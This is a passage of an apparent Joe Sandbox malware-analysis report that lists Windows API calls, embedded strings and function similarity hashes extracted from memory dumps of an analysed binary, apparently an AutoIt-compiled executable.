                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                              • String ID: U
                              • API String ID: 4009187628-3372436214
                              • Opcode ID: 25e35885164b8acff5075453ef88c2fd0111983dd7c1deb3ec2dfc2fd0592aa0
                              • Instruction ID: 555e702abba64fdd958d062918b729e51e61bb607a8663d9c17df22b1d660a8b
                              • Opcode Fuzzy Hash: 25e35885164b8acff5075453ef88c2fd0111983dd7c1deb3ec2dfc2fd0592aa0
                              • Instruction Fuzzy Hash: 8C71D431500209EFCF21AF64C884AFA7BB6FF49364F1442A9ED55DA3A6D7318C42DB61
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0090C2E4
                              • ImageList_EndDrag.COMCTL32 ref: 0090C2EA
                              • ReleaseCapture.USER32 ref: 0090C2F0
                              • SetWindowTextW.USER32(?,00000000), ref: 0090C39A
                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0090C3AD
                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0090C48F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                              • API String ID: 1924731296-2107944366
                              • Opcode ID: ada3741a11d93a94e60f1186f463264d332ba9b576c40aefeb0b99d19a3dc18b
                              • Instruction ID: f36fc1ad19be2ce0bf327de800fd1009fe703ccbdc32f9c0af9444594d04ebfe
                              • Opcode Fuzzy Hash: ada3741a11d93a94e60f1186f463264d332ba9b576c40aefeb0b99d19a3dc18b
                              • Instruction Fuzzy Hash: C751ABB4208304AFD714EF24CC95FAA7BE5FB89314F004A2DF5918B2E1DB71A948DB52
                              APIs
                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0090F910), ref: 008F903D
                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0090F910), ref: 008F9071
                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008F91EB
                              • SysFreeString.OLEAUT32(?), ref: 008F9215
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                              • String ID:
                              • API String ID: 560350794-0
                              • Opcode ID: 58ee88d8407a2a83a6a068fca10ff56a1b483149c88feb58bbfb6dd333941b3f
                              • Instruction ID: 8cbbaeb880b6fdb66c3eb4c0ccf15aa064a5e2d58c154b1c9bfa6809ee1f9915
                              • Opcode Fuzzy Hash: 58ee88d8407a2a83a6a068fca10ff56a1b483149c88feb58bbfb6dd333941b3f
                              • Instruction Fuzzy Hash: A2F10671A00119EFDB14DFA8C888EBEB7B9FF89314F108059EA55EB251DB31AE45CB50
                              APIs
                              • _memset.LIBCMT ref: 008FF9C9
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FFB5C
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FFB80
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FFBC0
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FFBE2
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008FFD5E
                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008FFD90
                              • CloseHandle.KERNEL32(?), ref: 008FFDBF
                              • CloseHandle.KERNEL32(?), ref: 008FFE36
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                              • String ID:
                              • API String ID: 4090791747-0
                              • Opcode ID: a87f3bd02c255d9ca9a90728f6d86c1440f1c1d0f611c28cb87f571e1b22faa3
                              • Instruction ID: 4ff2c17ddddbda30a89cc207b64f6e8433998181c0376017c1d15e653009a2eb
                              • Opcode Fuzzy Hash: a87f3bd02c255d9ca9a90728f6d86c1440f1c1d0f611c28cb87f571e1b22faa3
                              • Instruction Fuzzy Hash: 07E191312042559FCB14EF38C891A6ABBE1FF85354F18856DFA99CB2A2DB31DC41CB52
                              APIs
                                • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E38D3,?), ref: 008E48C7
                                • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E38D3,?), ref: 008E48E0
                                • Part of subcall function 008E4CD3: GetFileAttributesW.KERNEL32(?,008E3947), ref: 008E4CD4
                              • lstrcmpiW.KERNEL32(?,?), ref: 008E4FE2
                              • _wcscmp.LIBCMT ref: 008E4FFC
                              • MoveFileW.KERNEL32(?,?), ref: 008E5017
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                              • String ID:
                              • API String ID: 793581249-0
                              • Opcode ID: 5375424f642e7cc0123c7eee0bb3b20f9b11f4e3b352f3c55f2abf1fa5b6a7cf
                              • Instruction ID: b70286abeb82c2f988032d0a940e83a18681869320ee9efb10f77980f00c2a23
                              • Opcode Fuzzy Hash: 5375424f642e7cc0123c7eee0bb3b20f9b11f4e3b352f3c55f2abf1fa5b6a7cf
                              • Instruction Fuzzy Hash: EF5141B20087859BD624EB54C8919DFB3ECFF85344F10092EB689D3152EE74E6888767
                              APIs
                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0090896E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InvalidateRect
                              • String ID:
                              • API String ID: 634782764-0
                              • Opcode ID: 54d017595d0ebfa4ac478bef222c6074a371c23a5a381993640d64161ec8aada
                              • Instruction ID: 8928c0afb93bae5b76a8562079e8a31a41083fdd21fe686bfbf86b8c8d97f160
                              • Opcode Fuzzy Hash: 54d017595d0ebfa4ac478bef222c6074a371c23a5a381993640d64161ec8aada
                              • Instruction Fuzzy Hash: C9517230704208BFDF309F28CC85BAB7B69FB15320F604516F9A5E69E1DF75A9809B91
                              APIs
                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008BC547
                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008BC569
                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008BC581
                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008BC59F
                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008BC5C0
                              • DestroyIcon.USER32(00000000), ref: 008BC5CF
                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008BC5EC
                              • DestroyIcon.USER32(?), ref: 008BC5FB
                                • Part of subcall function 0090A71E: DeleteObject.GDI32(00000000), ref: 0090A757
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                              • String ID:
                              • API String ID: 2819616528-0
                              • Opcode ID: c500a4a3eb713fd93ac64d73bd5a8faef1fb28366539def2900a5d8865b51848
                              • Instruction ID: 85cdd4dfc8ccca560d753cf088310990478c0f0626a55106aefad21f162d9b04
                              • Opcode Fuzzy Hash: c500a4a3eb713fd93ac64d73bd5a8faef1fb28366539def2900a5d8865b51848
                              • Instruction Fuzzy Hash: E8514874A10209EFDB20EF24CC45FAA7BA5FB55724F104528F902D76A0DB70ED90EB51
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E0C
                              • HeapAlloc.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E13
                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008D8A84,00000B00,?,?), ref: 008D8E28
                              • GetCurrentProcess.KERNEL32(?,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E30
                              • DuplicateHandle.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E33
                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008D8A84,00000B00,?,?), ref: 008D8E43
                              • GetCurrentProcess.KERNEL32(008D8A84,00000000,?,008D8A84,00000B00,?,?), ref: 008D8E4B
                              • DuplicateHandle.KERNEL32(00000000,?,008D8A84,00000B00,?,?), ref: 008D8E4E
                              • CreateThread.KERNEL32(00000000,00000000,008D8E74,00000000,00000000,00000000), ref: 008D8E68
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                              • String ID:
                              • API String ID: 1957940570-0
                              • Opcode ID: 8f99695bf1bece97e188ad31def5256ce936f58bf57bf452a7f037480cd2a0c3
                              • Instruction ID: 2a920765a0cb2ed228923aef83d78f23ee01ace7803b67c198981bb87230ede4
                              • Opcode Fuzzy Hash: 8f99695bf1bece97e188ad31def5256ce936f58bf57bf452a7f037480cd2a0c3
                              • Instruction Fuzzy Hash: 8201BF75254304FFE760EB65DC4DF573B6CEB89B11F004521FA05DB691CA749900DB20
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$ClearInit$_memset
                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                              • API String ID: 2862541840-625585964
                              • Opcode ID: 9675946036feeebbef9b7fc8689095952e37c0440a6df4ea5168a749ef2c882e
                              • Instruction ID: 6f187a0ecc6c77e76b16e5f918243748bb28414a901a88e814902b765fb533e6
                              • Opcode Fuzzy Hash: 9675946036feeebbef9b7fc8689095952e37c0440a6df4ea5168a749ef2c882e
                              • Instruction Fuzzy Hash: 0991BC70A00219ABDF24DFA5C848FAEBBB8FF99714F108159F645EB290D7749941CFA0
                              APIs
                                • Part of subcall function 008D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?,?,008D799D), ref: 008D766F
                                • Part of subcall function 008D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D768A
                                • Part of subcall function 008D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D7698
                                • Part of subcall function 008D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?), ref: 008D76A8
                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 008F9B1B
                              • _memset.LIBCMT ref: 008F9B28
                              • _memset.LIBCMT ref: 008F9C6B
                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 008F9C97
                              • CoTaskMemFree.OLE32(?), ref: 008F9CA2
                              Strings
                              • NULL Pointer assignment, xrefs: 008F9CF0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                              • String ID: NULL Pointer assignment
                              • API String ID: 1300414916-2785691316
                              • Opcode ID: 8502b24f5a888d34472584052d5a0b633200e40f4b856987ff0a9d50234ff0af
                              • Instruction ID: 8ee3cce477a990437f0781a391fc7d5464a13be111ddf3ede1131e7d30aa780d
                              • Opcode Fuzzy Hash: 8502b24f5a888d34472584052d5a0b633200e40f4b856987ff0a9d50234ff0af
                              • Instruction Fuzzy Hash: 2A911A7190022D9BDB10EFA5DC84ADEBBB9FF08710F204159F519E7251EB719A44CFA1
                              APIs
                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00907093
                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 009070A7
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009070C1
                              • _wcscat.LIBCMT ref: 0090711C
                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00907133
                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00907161
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Window_wcscat
                              • String ID: SysListView32
                              • API String ID: 307300125-78025650
                              • Opcode ID: 608ea60312eb7e6470f1958ddf6cb6f9418f72e1f40b2534eadc6ca91c423d95
                              • Instruction ID: 47ecaec8856fb12bab78f5a25f61a613ab12aa9a4e0bdf2c0e72061c08e2142a
                              • Opcode Fuzzy Hash: 608ea60312eb7e6470f1958ddf6cb6f9418f72e1f40b2534eadc6ca91c423d95
                              • Instruction Fuzzy Hash: 95419171904308AFEB219FA4CC85BEEB7BCEF48364F10052AF544E71D1D672AD859B60
                              APIs
                                • Part of subcall function 008E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 008E3EB6
                                • Part of subcall function 008E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 008E3EC4
                                • Part of subcall function 008E3E91: CloseHandle.KERNEL32(00000000), ref: 008E3F8E
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FECB8
                              • GetLastError.KERNEL32 ref: 008FECCB
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FECFA
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 008FED77
                              • GetLastError.KERNEL32(00000000), ref: 008FED82
                              • CloseHandle.KERNEL32(00000000), ref: 008FEDB7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                              • String ID: SeDebugPrivilege
                              • API String ID: 2533919879-2896544425
                              • Opcode ID: 02176194a601eb0821fe74333e1fca265b0c2d2edca2cb71549785318f2d1961
                              • Instruction ID: b42b4b09e8a46844c7e6ff439df55b65ae39def953f5a2b1c550fafb21fa66e9
                              • Opcode Fuzzy Hash: 02176194a601eb0821fe74333e1fca265b0c2d2edca2cb71549785318f2d1961
                              • Instruction Fuzzy Hash: E9418A712042159FDB24EF28C8A5F7DB7A1FF80714F088059FA82DB2D2DB75A904CB92
                              APIs
                              • LoadIconW.USER32(00000000,00007F03), ref: 008E32C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconLoad
                              • String ID: blank$info$question$stop$warning
                              • API String ID: 2457776203-404129466
                              • Opcode ID: ef0d3efbdb96aa155d6898e7498e8433aa18235857ecd7374851025a9f50410e
                              • Instruction ID: 456522e57599aadf6aee3bfecc7f8c9937915b31f1cc567a268e8b4c5655bd40
                              • Opcode Fuzzy Hash: ef0d3efbdb96aa155d6898e7498e8433aa18235857ecd7374851025a9f50410e
                              • Instruction Fuzzy Hash: A011EB3160C3C67AE7015A56DC46D6BB39CFF1B375F10002AFA44D7181D6659F4049A6
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008E454E
                              • LoadStringW.USER32(00000000), ref: 008E4555
                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008E456B
                              • LoadStringW.USER32(00000000), ref: 008E4572
                              • _wprintf.LIBCMT ref: 008E4598
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008E45B6
                              Strings
                              • %s (%d) : ==> %s: %s %s, xrefs: 008E4593
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString$Message_wprintf
                              • String ID: %s (%d) : ==> %s: %s %s
                              • API String ID: 3648134473-3128320259
                              • Opcode ID: 0eedb7a6efe10e21f75454f0c2458e56283114994af92aab0091103df7da31c0
                              • Instruction ID: f8317b5a5dbc6ada890f1f2c1133576defc400ac50be8ebc3ef4da23d2959546
                              • Opcode Fuzzy Hash: 0eedb7a6efe10e21f75454f0c2458e56283114994af92aab0091103df7da31c0
                              • Instruction Fuzzy Hash: 8C014FF290420CBFE760EBA49D89EE7776CE708301F0005A5BB49D2451EA759F859B71
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • GetSystemMetrics.USER32(0000000F), ref: 0090D78A
                              • GetSystemMetrics.USER32(0000000F), ref: 0090D7AA
                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0090D9E5
                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0090DA03
                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0090DA24
                              • ShowWindow.USER32(00000003,00000000), ref: 0090DA43
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0090DA68
                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0090DA8B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                              • String ID:
                              • API String ID: 1211466189-0
                              • Opcode ID: c870019440143b6f83ac5fa8099fd26ecfa29b688069fc2a1d6a944fe2f0f2a1
                              • Instruction ID: 2dacf28dacbd89d48c97aa66b1a203fbf307424370e562bdf57a414584d95f78
                              • Opcode Fuzzy Hash: c870019440143b6f83ac5fa8099fd26ecfa29b688069fc2a1d6a944fe2f0f2a1
                              • Instruction Fuzzy Hash: EEB19A75601229EFDF14CFA8C9857BE7BB5FF44701F088069EC589B295D734AA90CB90
                              APIs
                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008BC417,00000004,00000000,00000000,00000000), ref: 00882ACF
                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008BC417,00000004,00000000,00000000,00000000,000000FF), ref: 00882B17
                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008BC417,00000004,00000000,00000000,00000000), ref: 008BC46A
                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008BC417,00000004,00000000,00000000,00000000), ref: 008BC4D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ShowWindow
                              • String ID:
                              • API String ID: 1268545403-0
                              • Opcode ID: 609c9413543081e5ee08916025e2a32f13980e094b8e5770e075879c1fa073b5
                              • Instruction ID: 09d939f7b7c486880674222e363c9df78e23778219046dcabf74f1e949edbd08
                              • Opcode Fuzzy Hash: 609c9413543081e5ee08916025e2a32f13980e094b8e5770e075879c1fa073b5
                              • Instruction Fuzzy Hash: B9414774218694AEC73DAB2CCC9CBBF7B92FF86314F18881DE057C6660C635A941D711
                              APIs
                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 008E737F
